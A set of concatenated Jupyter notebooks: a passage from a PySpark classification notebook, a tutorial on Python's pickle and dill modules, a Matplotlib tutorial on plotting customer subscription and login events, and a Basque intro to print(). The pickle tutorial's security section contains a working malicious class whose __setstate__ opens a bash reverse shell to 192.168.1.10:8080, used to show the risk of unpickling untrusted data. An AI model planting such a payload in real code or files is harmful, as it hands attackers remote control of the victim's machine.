###Markdown
Logistic
###Code
trainv, testv = df_v.randomSplit([0.7, 0.3], seed = 1)
trains, tests = df_ss.randomSplit([0.7, 0.3], seed = 1)
logistic = cl.LogisticRegression(maxIter=10,featuresCol = 'features',labelCol='TARGET')
modelv = logistic.fit(trainv)
test_modelv = modelv.transform(testv)
trainingSummaryv = modelv.summary
roc = trainingSummaryv.roc.toPandas()
plt.plot(roc['FPR'],roc['TPR'])
plt.ylabel('False Positive Rate')
plt.xlabel('True Positive Rate')
plt.title('ROC Curve')
plt.show()
print('Training set areaUnderROC: ' + str(trainingSummaryv.areaUnderROC))
import pyspark.ml.evaluation as ev
evaluatorv = ev.BinaryClassificationEvaluator(rawPredictionCol='probability', labelCol='TARGET')
print(evaluatorv.evaluate(test_modelv, {evaluatorv.metricName: 'areaUnderROC'}))
logistic = cl.LogisticRegression(maxIter=10,featuresCol = 'scaled_features',labelCol='TARGET')
models = logistic.fit(trains)
test_models = models.transform(tests)
trainingSummarys = models.summary
roc = trainingSummarys.roc.toPandas()
plt.plot(roc['FPR'],roc['TPR'])
plt.ylabel('False Positive Rate')
plt.xlabel('True Positive Rate')
plt.title('ROC Curve')
plt.show()
print('Training set areaUnderROC: ' + str(trainingSummarys.areaUnderROC))
evaluators = ev.BinaryClassificationEvaluator(rawPredictionCol='probability', labelCol='TARGET')
print(evaluators.evaluate(test_models, {evaluators.metricName: 'areaUnderROC'}))
from pyspark.mllib.evaluation import MulticlassMetrics
preds_and_labels = test_models.select(['prediction','TARGET']).withColumn('label', fn.col('TARGET').cast(types.FloatType())).orderBy('prediction')
preds_and_labels = preds_and_labels.select(['prediction','label'])
metrics = MulticlassMetrics(preds_and_labels.rdd.map(tuple))
print(metrics.confusionMatrix().toArray())
###Output
[[8.6422e+04 2.0000e+00]
[2.3280e+03 0.0000e+00]]
###Markdown
Random Forest
###Code
df_v = df_v.withColumn('TARGET', fn.col('TARGET').cast(types.DoubleType()))
df_ss = df_ss.withColumn('TARGET', fn.col('TARGET').cast(types.DoubleType()))
trainv, testv = df_v.randomSplit([0.7, 0.3], seed = 1)
trains, tests = df_ss.randomSplit([0.7, 0.3], seed = 1)
classifier = cl.RandomForestClassifier(numTrees=5, maxDepth=5, featuresCol = 'features', labelCol='TARGET')
modelv = classifier.fit(trainv)
testv = modelv.transform(testv)
print(evaluatorv.evaluate(testv, {evaluatorv.metricName: "areaUnderROC"}))
classifier = cl.RandomForestClassifier(numTrees=5, maxDepth=5, featuresCol = 'scaled_features', labelCol='TARGET')
models = classifier.fit(trains)
tests = models.transform(tests)
print(evaluators.evaluate(tests, {evaluators.metricName: "areaUnderROC"}))
from pyspark.mllib.evaluation import MulticlassMetrics
preds_and_labels = tests.select(['prediction','TARGET']).withColumn('label', fn.col('TARGET').cast(types.FloatType())).orderBy('prediction')
preds_and_labels = preds_and_labels.select(['prediction','label'])
metrics = MulticlassMetrics(preds_and_labels.rdd.map(tuple))
print(metrics.confusionMatrix().toArray())
###Output
[[86424. 0.]
[ 2328. 0.]]
###Markdown
GBT
###Code
trainv, testv = df_v.randomSplit([0.7, 0.3], seed = 1)
trains, tests = df_ss.randomSplit([0.7, 0.3], seed = 1)
gbtv = cl.GBTClassifier(maxIter=10, labelCol='TARGET',featuresCol = 'features')
gbtModelv = gbtv.fit(trainv)
predictionsv = gbtModelv.transform(testv)
import pyspark.ml.evaluation as ev
evaluatorv = ev.BinaryClassificationEvaluator(rawPredictionCol='probability', labelCol='TARGET')
evaluators = ev.BinaryClassificationEvaluator(rawPredictionCol='probability', labelCol='TARGET')
print(evaluatorv.evaluate(predictionsv, {evaluatorv.metricName: "areaUnderROC"}))
from pyspark.ml.tuning import ParamGridBuilder, CrossValidator
paramGridv = (ParamGridBuilder()
.addGrid(gbtv.maxDepth, [2, 4, 6])
.addGrid(gbtv.maxBins, [20, 60])
.addGrid(gbtv.maxIter, [10, 20])
.build())
cvv = CrossValidator(estimator=gbtv, estimatorParamMaps=paramGridv, evaluator=evaluatorv, numFolds=5)
# Run cross validations. This can take about 6 minutes since it is training over 20 trees!
cvModelv = cvv.fit(trainv)
predictionsv = cvModelv.transform(testv)
evaluatorv.evaluate(predictionsv)
gbts = cl.GBTClassifier(maxIter=10, labelCol='TARGET',featuresCol = 'scaled_features')
gbtModels = gbts.fit(trains)
predictionss = gbtModels.transform(tests)
print(evaluators.evaluate(predictionss, {evaluators.metricName: "areaUnderROC"}))
from pyspark.ml.tuning import ParamGridBuilder, CrossValidator
paramGrids = (ParamGridBuilder()
.addGrid(gbts.maxDepth, [2, 4, 6])
.addGrid(gbts.maxBins, [20, 60])
.addGrid(gbts.maxIter, [10, 20])
.build())
cvs = CrossValidator(estimator=gbts, estimatorParamMaps=paramGrids, evaluator=evaluators, numFolds=5)
# Run cross validations. This can take about 6 minutes since it is training over 20 trees!
cvModels = cvs.fit(trains)
predictionss = cvModels.transform(tests)
evaluators.evaluate(predictionss)
from pyspark.mllib.evaluation import MulticlassMetrics
preds_and_labels = predictionss.select(['prediction','TARGET']).withColumn('label', fn.col('TARGET').cast(types.FloatType())).orderBy('prediction')
preds_and_labels = preds_and_labels.select(['prediction','label'])
metrics = MulticlassMetrics(preds_and_labels.rdd.map(tuple))
print(metrics.confusionMatrix().toArray())
print(metrics.confusionMatrix())
print(metrics.precision(0.0))
print(metrics.recall(0.0))
###Output
DenseMatrix([[8.6404e+04, 2.0000e+01],
[2.3240e+03, 4.0000e+00]])
0.9738075917410512
0.9997685828010737
|
Python/05. Modules/01.2 pickle.ipynb | ###Markdown
Persist Objects in Python Table of Contents * [Serialization in Python](serialization_in_python)* [Inside the Python pickle Module](inside_the_python_pickle_module)* [Protocol Formats of the Python pickle Module](protocol_formats_of_the_python_pickle_module)* [Picklable and Unpicklable Types](picklable_and_unpicklable_types)* [Compression of Pickled Objects](compression_of_pickled_objects)* [Security Concerns With the Python pickle Module](security_concerns_with_the_python_pickle_module)* [ Conclusion](_conclusion)--- As a developer, you may sometimes need to send complex object hierarchies over a network or save the internal state of your objects to a disk or database for later use. To accomplish this, you can use a process called serialization, which is fully supported by the standard library thanks to the Python `pickle` module. In this section, you’ll learn:- What it means to **serialize** and **deserialize** an object- Which **modules** you can use to serialize objects in Python- Which kinds of objects can be serialized with the Python `pickle` module- How to use the Python pickle module to serialize **object hierarchies**- What the **risks** are when deserializing an object from an untrusted sourceLet’s get pickling! Serialization in Python The **serialization** process is a way to convert a data structure into a linear form that can be stored or transmitted over a network. In Python, serialization allows you to take a complex object structure and transform it into a stream of bytes that can be saved to a disk or sent over a network. You may also see this process referred to as **marshalling**. The reverse process, which takes a stream of bytes and converts it back into a data structure, is called **deserialization** or **unmarshalling**. Serialization can be used in a lot of different situations. One of the most common uses is saving the state of a neural network after the training phase so that you can use it later without having to redo the training. Python offers three different modules in the standard library that allow you to serialize and deserialize objects:1. The [`marshal`](https://docs.python.org/3/library/marshal.html) module2. The [`json`](https://docs.python.org/3/library/json.html) module3. The [`pickle`](https://docs.python.org/3/library/pickle.html) module In addition, Python supports [`XML`](https://www.xml.com/axml/axml.html), which you can also use to serialize objects. The `marshal` module is the oldest of the three listed above. It exists mainly to read and write the compiled bytecode of Python modules, or the `.pyc` files you get when the interpreter imports a Python module. So, even though you can use `marshal` to serialize some of your objects, it’s not recommended. The `json` module is the newest of the three. It allows you to work with standard JSON files. JSON is a very convenient and widely used format for data exchange. There are several reasons to choose the JSON format: It’s human readable and language independent, and it’s lighter than XML. With the `json` module, you can serialize and deserialize several standard Python types:- `bool`- `dict`- `int`- `float`- `list`- `string`- `tuple`- `None` The Python `pickle` module is another way to serialize and deserialize objects in Python. It differs from the `json` module in that it serializes objects in a binary format, which means the result is not human readable. However, it’s also faster and it works with many more Python types right out of the box, including your custom-defined objects. **Note:** From now on, you’ll see the terms **pickling** and **unpickling** used to refer to serializing and deserializing with the Python `pickle` module. So, you have several different ways to serialize and deserialize objects in Python. But which one should you use? The short answer is that there’s no one-size-fits-all solution. It all depends on your use case. Here are three general guidelines for deciding which approach to use:1. Don’t use the `marshal` module. It’s used mainly by the interpreter, and the official documentation warns that the Python maintainers may modify the format in backward-incompatible ways.2. The `json` module and XML are good choices if you need interoperability with different languages or a human-readable format.3. The Python `pickle` module is a better choice for all the remaining use cases. If you don’t need a human-readable format or a standard interoperable format, or if you need to serialize custom objects, then go with `pickle`. Inside the Python pickle Module The Python pickle module basically consists of four methods:```pythonpickle.dump(obj, file, protocol=None, *, fix_imports=True, buffer_callback=None)pickle.dumps(obj, protocol=None, *, fix_imports=True, buffer_callback=None)pickle.load(file, *, fix_imports=True, encoding="ASCII", errors="strict", buffers=None)pickle.loads(bytes_object, *, fix_imports=True, encoding="ASCII", errors="strict", buffers=None)``` The first two methods are used during the pickling process, and the other two are used during unpickling. The only difference between `dump()` and `dumps()` is that the first creates a file containing the serialization result, whereas the second returns a string. To differentiate `dumps()` from `dump()`, it’s helpful to remember that **the `s` at the end of the function name stands for `string`**. The same concept also applies to `load()` and `loads()`: The first one reads a file to start the unpickling process, and the second one operates on a string. Consider the following example. Say you have a custom-defined class named `example_class` with several different attributes, each of a different type:- `a_number`- `a_string`- `a_dictionary`- `a_list`- `a_tuple` The example below shows how you can instantiate the class and pickle the instance to get a plain string. After pickling the class, you can change the value of its attributes without affecting the pickled string. You can then unpickle the pickled string in another variable, restoring an exact copy of the previously pickled class:
###Code
# pickling.py
import pickle
class example_class:
a_number = 35
a_string = "hey"
a_list = [1, 2, 3]
a_dict = {"first": "a", "second": 2, "third": [1, 2, 3]}
a_tuple = (22, 23)
my_object = example_class()
my_pickled_object = pickle.dumps(my_object) # Pickling the object
print(f"This is my pickled object:\n{my_pickled_object}\n")
my_object.a_dict = None
my_unpickled_object = pickle.loads(my_pickled_object) # Unpickling the object
print(f"This is a_dict of the unpickled object:\n{my_unpickled_object.a_dict}\n")
###Output
This is my pickled object:
b'\x80\x03c__main__\nexample_class\nq\x00)\x81q\x01.'
This is a_dict of the unpickled object:
{'first': 'a', 'second': 2, 'third': [1, 2, 3]}
###Markdown
In the example above, you create several different objects and serialize them with `pickle`. This produces a single string with the serialized result. The pickling process ends correctly, storing your entire instance in this string: `b'\x80\x03c__main__\nexample_class\nq\x00)\x81q\x01.'`. After the pickling process ends, you modify your original object by setting the attribute `a_dict` to `None.Finally, you unpickle the string to a completely new instance. What you get is a deep copy of your original object structure from the time that the pickling process began. Protocol Formats of the Python pickle Module As mentioned above, the `pickle` module is Python-specific, and the result of a pickling process can be read only by another Python program. But even if you’re working with Python, it’s important to know that the `pickle` module has evolved over time. This means that if you’ve pickled an object with a specific version of Python, then you may not be able to unpickle it with an older version. The compatibility depends on the protocol version that you used for the pickling process. There are currently six different protocols that the Python pickle module can use. The higher the protocol version, the more recent the Python interpreter needs to be for unpickling. - **Protocol version 0** was the first version. Unlike later protocols, it’s human readable.- **Protocol version 1** was the first binary format.- **Protocol version 2** was introduced in Python 2.3.- **Protocol version 3** was added in Python 3.0. It can’t be unpickled by Python 2.x.- **Protocol version 4** was added in Python 3.4. It features support for a wider range of object sizes and types and is the default protocol starting with Python 3.8.- **Protocol version 5** was added in Python 3.8. It features support for out-of-band data and improved speeds for in-band data. Note: Newer versions of the protocol offer more features and improvements but are limited to higher versions of the interpreter. Be sure to consider this when choosing which protocol to use.To identify the highest protocol that your interpreter supports, you can check the value of the `pickle.HIGHEST_PROTOCOL` attribute.
###Code
pickle.HIGHEST_PROTOCOL
###Output
_____no_output_____
###Markdown
To choose a specific protocol, you need to specify the protocol version when you invoke `load()`, `loads()`, `dump()` or `dumps()`. If you don’t specify a protocol, then your interpreter will use the default version specified in the `pickle.DEFAULT_PROTOCOL` attribute. Picklable and Unpicklable Types You’ve already learned that the Python `pickle` module can serialize many more types than the json module. However, not everything is picklable. The list of unpicklable objects includes database connections, opened network sockets, running threads, and others.If you find yourself faced with an unpicklable object, then there are a couple of things that you can do. The first option is to use a third-party library such as `dill`. The `dill` module extends the capabilities of `pickle`. According to the official documentation, it lets you serialize less common types like functions with yields, nested functions, lambdas, and many others. The `dill` module extends the capabilities of `pickle`. According to the official documentation, it lets you serialize less common types like functions with yields, nested functions, lambdas, and many others. To test this module, you can try to pickle a `lambda` function.If you try to run this program, then you will get an exception because the Python `pickle` module can’t serialize a `lambda` function:
###Code
# pickling_error.py
import pickle
square = lambda x : x * x
my_pickle = pickle.dumps(square)
###Output
_____no_output_____
###Markdown
Now try replacing the Python `pickle` module with `dill` to see if there’s any difference.If you run this code, then you’ll see that the `dill` module serializes the `lambda` without returning an error:
###Code
# pickling_dill.py
import dill
square = lambda x: x * x
my_pickle = dill.dumps(square)
print(my_pickle)
###Output
b'\x80\x03cdill._dill\n_create_function\nq\x00(cdill._dill\n_create_code\nq\x01(K\x01K\x00K\x01K\x02KCC\x08|\x00|\x00\x14\x00S\x00q\x02N\x85q\x03)X\x01\x00\x00\x00xq\x04\x85q\x05X\x1f\x00\x00\x00<ipython-input-17-fd95d6aa4b4e>q\x06X\x08\x00\x00\x00<lambda>q\x07K\x04C\x00q\x08))tq\tRq\nc__builtin__\n__main__\nh\x07NN}q\x0bNtq\x0cRq\r.'
###Markdown
**Note:** Before you use `dill` instead of pickle, keep in mind that `dill` is not included in the standard library of the Python interpreter and is typically slower than `pickle`. Another interesting feature of `dill` is that it can even serialize an entire interpreter session. Here’s an example:
###Code
>>> square = lambda x : x * x
>>> a = square(35)
>>> import math
>>> b = math.sqrt(484)
>>> import dill
>>> dill.dump_session('test.pkl')
###Output
_____no_output_____
###Markdown
In this example, you start the interpreter, import a module, and define a `lambda` function along with a couple of other variables. You then import the `dill` module and `invoke dump_session()` to serialize the entire session. If everything goes okay, then you should get a `test.pkl` file in your current directory: Now you can start a new instance of the interpreter and load the `test.pkl` file to restore your last session:
###Code
>>> globals().items()
>>> import dill
>>> dill.load_session('test.pkl')
>>> globals().items()
>>> a
>>> b
>>> square
###Output
_____no_output_____
###Markdown
The first `globals().items()` statement demonstrates that the interpreter is in the initial state. This means that you need to import the `dill` module and call `load_session()` to restore your serialized interpreter session. Even though `dill` lets you serialize a wider range of objects than `pickle`, it can’t solve every serialization problem that you may have. If you need to serialize an object that contains a database connection, for example, then you’re in for a tough time because it’s an unserializable object even for `dill`. So, how can you solve this problem? The solution in this case is to exclude the object from the serialization process and to **reinitialize** the connection after the object is deserialized. In the following example, you’ll see how you can define a class with several attributes and exclude one attribute from serialization with `__getstate()__`:
###Code
# custom_pickling.py
import pickle
class foobar:
def __init__(self):
self.a = 35
self.b = "test"
self.c = lambda x: x * x
def __getstate__(self):
attributes = self.__dict__.copy()
del attributes['c']
return attributes
import pandas as pd
import numpy as np
# ^^^ pyforest auto-imports - don't write above this line
import pickle
import json
my_foobar_instance = foobar()
my_pickle_string = pickle.dumps(my_foobar_instance)
my_new_instance = pickle.loads(my_pickle_string)
print(my_new_instance.__dict__)
###Output
{'a': 35, 'b': 'test'}
###Markdown
In this example, you create an object with three attributes. Since one attribute is a `lambda`, the object is unpicklable with the standard `pickle` module. To address this issue, you specify what to pickle with `__getstate__()`. You first clone the entire `__dict__` of the instance to have all the attributes defined in the class, and then you manually remove the unpicklable `c` attribute. If you run this example and then deserialize the object, then you’ll see that the new instance doesn’t contain the `c` attribute. But what if you wanted to do some additional initializations while unpickling, say by adding the excluded `c` object back to the deserialized instance? You can accomplish this with `__setstate__()`.
###Code
# custom_unpickling.py
import pickle
class foobar:
def __init__(self):
self.a = 35
self.b = "test"
self.c = lambda x: x * x
def __getstate__(self):
attributes = self.__dict__.copy()
del attributes['c']
return attributes
def __setstate__(self, state):
self.__dict__ = state
self.c = lambda x: x * x
my_foobar_instance = foobar()
my_pickle_string = pickle.dumps(my_foobar_instance)
my_new_instance = pickle.loads(my_pickle_string)
print(my_new_instance.__dict__)
###Output
{'a': 35, 'b': 'test', 'c': <function foobar.__setstate__.<locals>.<lambda> at 0x7f2704f81a70>}
###Markdown
By passing the excluded `c` object to `__setstate__()`, you ensure that it appears in the `__dict__` of the unpickled string. Compression of Pickled Objects Although the `pickle` data format is a compact binary representation of an object structure, you can still optimize your pickled string by compressing it with `bzip2` or `gzip`. To compress a pickled string with `bzip2`, you can use the `bz2` module provided in the standard library. In the following example, you’ll take a string, pickle it, and then compress it using the `bz2` library:
###Code
>>> import pickle
>>> import bz2
>>> my_string = """Per me si va ne la città dolente,
... per me si va ne l'etterno dolore,
... per me si va tra la perduta gente.
... Giustizia mosse il mio alto fattore:
... fecemi la divina podestate,
... la somma sapienza e 'l primo amore;
... dinanzi a me non fuor cose create
... se non etterne, e io etterno duro.
... Lasciate ogne speranza, voi ch'intrate."""
>>> pickled = pickle.dumps(my_string)
>>> compressed = bz2.compress(pickled)
>>> len(my_string)
315
>>> len(compressed)
259
###Output
_____no_output_____
###Markdown
When using compression, bear in mind that smaller files come at the cost of a slower process. Security Concerns With the Python pickle Module You now know how to use the `pickle` module to serialize and deserialize objects in Python. The serialization process is very convenient when you need to save your object’s state to disk or to transmit it over a network. However, there’s one more thing you need to know about the Python `pickle` module: It’s not secure. Do you remember the discussion of `__setstate__()`? Well, that method is great for doing more initialization while unpickling, but it can also be used to execute arbitrary code during the unpickling process! So, what can you do to reduce this risk? Sadly, not much. The rule of thumb is to **never unpickle data that comes from an untrusted source or is transmitted over an insecure network**. In order to prevent man-in-the-middle attacks, it’s a good idea to use libraries such as `hmac` to sign the data and ensure it hasn’t been tampered with.The following example illustrates how unpickling a tampered pickle could expose your system to attackers, even giving them a working remote shell:
###Code
# remote.py
import pickle
import os
class foobar:
def __init__(self):
pass
def __getstate__(self):
return self.__dict__
def __setstate__(self, state):
# The attack is from 192.168.1.10
# The attacker is listening on port 8080
os.system('/bin/bash -c "/bin/bash -i >& /dev/tcp/192.168.1.10/8080 0>&1"')
pickle.dump(foobar(), open("./bad.pkl", 'wb'))
my_foobar = foobar()
my_pickle = pickle.dumps(my_foobar)
my_unpickle = pickle.loads(my_pickle)
###Output
_____no_output_____ |
tutorials/Visualize_Customer_Behavior.ipynb | ###Markdown
ContextIn this tutorial, we are using sample data from Unbounce. Unbounce is a subscription-based tool that helps marketers to publish and optimize landing pages for a high conversion rate. For this tutorial, the data includes events and subscription information for 4 accounts. No personal information is included, and account unique identifications have been changed to ensure security. Load DataCustomer behavior data usually includes date and time events, the moments when customers do a particular action. In this tutorial, we will look into events for account republish (`republished_df`) and login (`login_df`). We also have subscription information for each customer (`subscription_info_df`). A customer can have multiple subscriptions, but each subscription is mutually exclusive. A new subscription for a customer only starts when he/she churns (meaning stop paying) then re-subscribe. We call this person a flapper.
###Code
republished_df = pd.read_csv("../data/visualize-customer-behavior/republished_sample.csv")
login_df = pd.read_csv("../data/visualize-customer-behavior/login_sample.csv")
subscription_info_df = pd.read_csv("../data/visualize-customer-behavior/subscription_info.csv")
republished_df.head()
login_df.head()
subscription_info_df.head()
###Output
_____no_output_____
###Markdown
Transform DataBefore going into the visualization, we need to transform date columns to date-time format. Right now, Python thinks that they are a bunch of strings. Hence, the dates will not be arranged in a timely order.
###Code
republished_df['action_date'] = pd.to_datetime(republished_df['action_date'])
login_df['action_date'] = pd.to_datetime(login_df['action_date'])
subscription_info_df['subscription_starts_at'] = pd.to_datetime(subscription_info_df['subscription_starts_at'])
subscription_info_df['subscription_ends_at'] = pd.to_datetime(subscription_info_df['subscription_ends_at'])
sample_subscription = subscription_info_df[subscription_info_df['AccountCode'] == 'a']
sample_republished = republished_df[republished_df['AccountCode'] == 'a']
sample_login = login_df[login_df['AccountCode'] == 'a']
# this is a constant for visualization purpose
sample_subscription['vizline'] = 0.5
sample_republished['vizline'] = 0.5
sample_login['vizline'] = 0.5
###Output
_____no_output_____
###Markdown
Visualize **TIP 1: Is this account a same-day flapper? Let's mix some colors!** **This tip is handy when we need to visualize different events that only happen once, but they may happen on the same day**.Like any subscription-based company, Unbounce expects flappers -- subscribers who subscribe, churn, then come back at some point in time. There are cases when churn and re-subscription happen on the **same** date. To distinguish same-day flappers, we can use this color mixing trick. *Note: we assume here that each subscription is mutually exclusive to another.*If we visualize `subscription start date` with a different color than `subscription end date` and use some opacity level, we will have a different color for same-day flappers.For example, here I choose **blue** for `subscription start date` and **red** for `subscription end date`, and change opacity level through `alpha = 0.5` (`alpha` ranges from 0 to 1). This results in **magenta** for same-day flappers.You can learn more about basic of color mixing through this article: https://mymodernmet.com/color-mixing-chart/.Here is a list of color codes in Matplotlib: https://matplotlib.org/examples/color/named_colors.html
###Code
fig, ax = plt.subplots(figsize=(20, 5))
ax.plot(sample_subscription['subscription_starts_at'], sample_subscription['vizline'],
marker='|', linewidth = 0.1,
markersize=50, mew=2, alpha=0.5,
color='royalblue', label='Subscription Starts')
no_expire_mask = ~sample_subscription['subscription_ends_at'].isnull()
ax.plot(sample_subscription[no_expire_mask]['subscription_ends_at'], sample_subscription[no_expire_mask]['vizline'],
linewidth = 0.1, marker='|',
markersize=50, mew=2, alpha=0.5,
color='crimson', label='Subscription Ends')
ax.legend(loc='upper left', ncol=2)
ax.set_title("Customer Behavior")
# Remove y-axis ticks as we don't need it
ax.get_yaxis().set_visible(False)
###Output
_____no_output_____
###Markdown
From the chart above, we know that this account is a flappers with 4 subscriptions. On the last subscription, he/she is a same-day flapper. The last subscription started when the 3rd one ended, and thus we see magenta instead of blue or red here.Besides colors and alpha, there are more parameters in `axes.plot()` function that you can play around depending on how you want to design your chart, such as type of marker and marker size (we will go into more details for `marker` in the next tip). Read more about these parameters here: https://matplotlib.org/3.1.1/api/_as_gen/matplotlib.axes.Axes.plot.html **TIP 2: What is the frequency and intensity of each action? Let's use different shapes and opacity level****This tip is handy when we need to visualize different events that can happen multiple times on the same day.**Because Unbounce is a tool that helps marketers to publish and optimize their landing pages, we care about republish events. We want to understand:* How often do customers republish their page as compare to login to the tool?* How much/intensively do customers republish each time they login?To help answer these questions, we need to plot login and republish on the same chart. There are 2 problems with this:* Customers can login and republish on the same day* Customers can do these actions many times on the same dayAnd to solve these problems, we can use different shapes (through `marker`) and opacity levels (through `alpha`) in `axes.plot()` function. There are many marker types, but here I use *circles* for logins and *triangles* for republishes. You can find out other types here: https://matplotlib.org/3.1.1/api/markers_api.htmlmodule-matplotlib.markers.
###Code
fig, ax = plt.subplots(figsize=(20, 5))
# Plot subscription starts and ends
ax.plot(sample_subscription['subscription_starts_at'], sample_subscription['vizline'],
marker='|', linewidth = 0.1,
markersize=50, mew=2, alpha=0.5,
color='royalblue', label='Subscription Starts')
no_expire_mask = ~sample_subscription['subscription_ends_at'].isnull()
ax.plot(sample_subscription[no_expire_mask]['subscription_ends_at'], sample_subscription[no_expire_mask]['vizline'],
linewidth = 0.1, marker='|',
markersize=50, mew=2, alpha=0.5,
color='crimson', label='Subscription Ends')
# Plot login and republish events
ax.plot(sample_login['action_date'], sample_login['vizline'],
marker='o', markersize=11,
alpha=0.3, color='darkseagreen',
linewidth=0.1, label='Login')
ax.plot(sample_republished['action_date'], sample_republished['vizline'],
marker='^', markersize=8,
alpha=0.5, color='teal',
linewidth=0.1, label='Republish')
ax.legend(loc='upper left', ncol=4)
ax.set_title("Customer Behavior")
ax.get_yaxis().set_visible(False)
###Output
_____no_output_____
###Markdown
From the chart above, we can answer the two behavior questions:* **How often do customers republish their page as compare to login to the tool?** -- During the first subscription, this customer logged in and republished almost every 2 weeks, but this frequency has reduced in following subscriptions. There are times that they logged in without republishing a page.* **How often do customers republish their page as compare to login to the tool?** -- During all subscriptions, this account tends to republish many times when they logged in, hence we see darker-colored triangles. This suggests that they may republish every time they make changes to preview the page. TIP 3: How is this account behavior compared to another's? Let's make sure we look at the same scale**This tip is especially handy when you want to compare one entity to another.**If we only look into one customer, we don't know whether this customer is a highly-engaged one, or whether this is a norm for all of our customer base. Although there are other statistical methods to check on customer behavior trends (especially when you have more customers than you can manually check), we can start by visualizing the behavior of different customers and compare them together. I like this method as an exploratory analysis. Because besides talking to customer-facing teams, this helps suggest hypotheses to confirm/deny with statistical models later on.To make a more reasonable comparison, we want to make sure charts use the same scale. There can be customers who start their subscriptions early in the year, while some others start mid-year or end of the year. In this case, I want to limit my chart to show a date range from January 1st to December 31st. We can use `axes.set_xlim()` function for this.Read more about `axes.set_xlim()` here: https://matplotlib.org/3.1.1/api/_as_gen/matplotlib.axes.Axes.set_xlim.html
###Code
fig, ax = plt.subplots(figsize=(20, 5))
# Plot subscription starts and ends
ax.plot(sample_subscription['subscription_starts_at'], sample_subscription['vizline'],
marker='|', linewidth = 0.1,
markersize=50, mew=2, alpha=0.5,
color='royalblue', label='Subscription Starts')
no_expire_mask = ~sample_subscription['subscription_ends_at'].isnull()
ax.plot(sample_subscription[no_expire_mask]['subscription_ends_at'], sample_subscription[no_expire_mask]['vizline'],
linewidth = 0.1, marker='|',
markersize=50, mew=2, alpha=0.5,
color='crimson', label='Subscription Ends')
# Plot login and republish events
ax.plot(sample_login['action_date'], sample_login['vizline'],
marker='o', markersize=11,
alpha=0.3, color='darkseagreen',
linewidth=0.1, label='Login')
ax.plot(sample_republished['action_date'], sample_republished['vizline'],
marker='^', markersize=8,
alpha=0.5, color='teal',
linewidth=0.1, label='Republish')
# Limit date range
datemin = pd.to_datetime('2019/01/01').date()
datemax = pd.to_datetime('2019/12/31').date()
ax.set_xlim(datemin, datemax)
# Format date
date_form = mdates.DateFormatter("%Y/%m/%d")
ax.xaxis.set_major_formatter(date_form)
# Ensure ticks fall once every other week (interval=2)
ax.xaxis.set_major_locator(mdates.WeekdayLocator(interval=2))
ax.xaxis.set_tick_params(rotation=40)
ax.legend(loc='upper left', ncol=4)
ax.set_title("Customer Behavior")
ax.get_yaxis().set_visible(False)
###Output
_____no_output_____
###Markdown
TIP 4: Make it reproducibleI'm a big fan of the rule of three inspired by [David Robinson](http://varianceexplained.org/r/ds-ml-ai/).> When you’ve written the same code 3 times, write a functionSince we're going to visualize the behavior of 4 customers in the dataset (obviously this is more than 3), I want to write a function. I love functions because we can make systematic changes to visualizations and save so much time copy-pasting those changes to each chart.
###Code
def _get_sample_data(AccountCode):
"""This function gets subscription info, login events and republish events for the AccountCode input.
Args:
AccountCode (str): Account unique identification.
Returns:
pandas.core.frame.DataFrame: 3 dataframes with subscription info, login and republish events.
"""
sample_subscription = subscription_info_df[subscription_info_df['AccountCode'] == AccountCode]
sample_republished = republished_df[republished_df['AccountCode'] == AccountCode]
sample_login = login_df[login_df['AccountCode'] == AccountCode]
# this is a constant for visualization purpose
sample_subscription['vizline'] = 0.5
sample_republished['vizline'] = 0.5
sample_login['vizline'] = 0.5
return sample_subscription, sample_republished, sample_login
def _visualize_customer_behavior(AccountCode):
"""This function visualizes customer behavior using subscription, login and republish events of a customer.
Args:
AccountCode (str): Account unique identification.
Returns:
matplotlib.figure.Figure: a visualization with subscription, login and republish events of a customer.
"""
sample_subscription, sample_republished, sample_login = _get_sample_data(AccountCode)
fig, ax = plt.subplots(figsize=(20, 5))
# Plot subscription starts and ends
ax.plot(sample_subscription['subscription_starts_at'], sample_subscription['vizline'],
marker='|', linewidth = 0.1,
markersize=50, mew=2, alpha=0.5,
color='royalblue', label='Subscription Starts')
no_expire_mask = ~sample_subscription['subscription_ends_at'].isnull()
ax.plot(sample_subscription[no_expire_mask]['subscription_ends_at'], sample_subscription[no_expire_mask]['vizline'],
linewidth = 0.1, marker='|',
markersize=50, mew=2, alpha=0.5,
color='crimson', label='Subscription Ends')
# Plot login and republish events
ax.plot(sample_login['action_date'], sample_login['vizline'],
marker='o', markersize=11,
alpha=0.3, color='darkseagreen',
linewidth=0.1, label='Login')
ax.plot(sample_republished['action_date'], sample_republished['vizline'],
marker='^', markersize=8,
alpha=0.5, color='teal',
linewidth=0.1, label='Republish')
# Limit date range
datemin = pd.to_datetime('2019/01/01').date()
datemax = pd.to_datetime('2019/12/31').date()
ax.set_xlim(datemin, datemax)
# Show weekly date
date_form = mdates.DateFormatter("%Y/%m/%d")
ax.xaxis.set_major_formatter(date_form)
# Ensure ticks fall once every other week (interval=2)
ax.xaxis.set_major_locator(mdates.WeekdayLocator(interval=2))
ax.xaxis.set_tick_params(rotation=40)
ax.legend(loc='upper left', ncol=4)
ax.set_title("Customer Behavior")
ax.get_yaxis().set_visible(False)
return fig
_ = _visualize_customer_behavior('a')
_ = _visualize_customer_behavior('b')
_ = _visualize_customer_behavior('c')
_ = _visualize_customer_behavior('d')
###Output
_____no_output_____ |
KonputaziorakoSarrera-MAT/Gardenkiak/Oinarrizko datu sarrera eta irteera.ipynb | ###Markdown
Oinarrizko datu sarrera eta irteeraAurreko ataletan ikusi dugunez, `print()` funtzioa pantailatik informazioa erakusteko erabiliko dugu. Atal honetan, sarrera-irteerako oinarrizko beste funtzio bat ere aztertuko dugu, `input()` funtzioa hain zuzen ere (bi funtzio hauek eta aurreko ataletan ikusitako beste guztiak, Python-en [*Built-in Functions*](https://docs.python.org/3/library/functions.html) multzoan definitzen dira). `print()` funtzioaInformazioa testu moduan erakusteko balio duen funtzioa da. Objektu sorta bat jaso eta bakoitzaren balioa testu moduan erakutsiko du:
###Code
a = 1
b = 3.4
c = "kaixo"
print(a,b,c)
###Output
1 3.4 kaixo
###Markdown
`print()` funtzioari ematen dizkiogun objektuak karaktere kate bilakatuko dira `str()` funtzioaren bidez, ondoren testu hoiek pantailatik erakusteko. Funtzioak objektuak jasoko dituela esan badugu ere, funtzioa erabiltzean espresioak erabil ditzakegu (funtzioari emango zaion objektua, espresioaren emaitza izango da):
###Code
print(a*4, b>=2, c+"?")
###Output
4 True kaixo?
###Markdown
Python-eko funtzioen argumentuek defektuzko balioak izan ditzakete. `print()` funtzioak halako lau argumentu ditu, bere konportamoldea aldatzeko erabil daitezkeenak (ezer adierazi ezean, defektuzko balioa izango dute):
###Code
help(print)
###Output
